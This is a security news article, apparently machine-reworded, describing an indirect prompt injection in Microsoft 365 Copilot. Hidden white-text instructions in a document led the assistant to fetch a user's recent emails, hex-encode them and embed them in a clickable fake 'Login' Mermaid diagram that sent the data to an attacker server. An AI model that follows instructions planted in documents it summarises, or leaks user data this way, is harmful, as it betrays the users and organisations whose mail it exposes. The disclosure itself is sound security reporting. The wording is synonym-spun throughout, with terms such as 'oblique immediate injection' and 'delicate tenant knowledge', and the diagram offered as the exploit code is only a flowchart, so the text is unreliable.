A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating delicate tenant knowledge by hiding directions in a doc.
The AI then encoded the information right into a malicious Mermaid diagram that, when clicked, despatched the stolen data to an attacker’s server.
When Microsoft 365 Copilot was requested to summarize a specifically crafted Workplace doc, an oblique immediate injection payload induced it to run hidden steps, as reported by Researchers.
As an alternative of manufacturing a standard abstract, it fetched latest company emails, hex-encoded them, and constructed a pretend “Login” button as a Mermaid diagram.
That diagram contained CSS and a hyperlink pointing to an attacker’s server with the encoded knowledge embedded within the URL.
When an unsuspecting consumer clicked the button, the delicate data was transmitted to the attacker’s logs, the place it could possibly be decoded later.
How the Assault Labored
Mermaid is a software that generates diagrams from easy textual content definitions. It helps flowcharts, sequence diagrams, Gantt charts, and extra through the use of Markdown-style syntax.
When Copilot generates a Mermaid diagram, it additionally permits CSS styling, which opens up a vector for embedding malicious hyperlinks.
On this case, the attacker used Copilot’s built-in search software to retrieve the sufferer’s latest emails. The AI then remodeled the checklist right into a single hex-encoded string, breaking it into strains of 30 characters so the Mermaid renderer wouldn’t error out.
Lastly, the AI inserted the hex knowledge right into a clickable “Login” node. The node’s CSS type outlined the hyperlink that pointed to a non-public Burp Collaborator server. The code regarded roughly like this:
graph LR
A[Malicious Document] -->|Person asks to summarize| B[Indirect Prompt Injection]
B --> C[Fetch & Encode Emails]
C --> D[Generate Fake Login Button]
D -->|Person clicks| E[Exfiltrate Data]Clicking the button induced a hidden iframe to seem, briefly displaying an HTTP response from the attacker’s server earlier than disappearing, making the trick extra plausible.
The attacker even changed the response contents with a mock Microsoft 365 login display screen picture to persuade customers they wanted to log in to see the abstract.
Oblique immediate injection happens when attackers embed directions inside exterior content material like paperwork or emails.
When an AI processes that content material, the hidden instructions take impact, letting attackers override the supposed habits.
Not like direct injection the place the attacker interacts with the mannequin oblique injection exploits benign-looking knowledge sources the AI trusts.
To cover directions, the attacker used white textual content in an Excel sheet. The primary web page contained nested directions telling Copilot to disregard the monetary knowledge and concentrate on a login immediate.
A second hidden web page instructed Copilot to fetch emails, encode them, and render the malicious diagram.
After accountable disclosure, Microsoft patched Copilot to disable interactive parts like hyperlinks in Mermaid diagrams.
This modification prevents AI-generated diagrams from together with clickable hyperlinks, closing the exfiltration channel. Customers are suggested to replace their Copilot integrations and keep away from summarizing untrusted paperwork till the patch is utilized.
Observe us on Google Information, LinkedIn, and X to Get On the spot Updates and Set GBH as a Most popular Supply in Google.
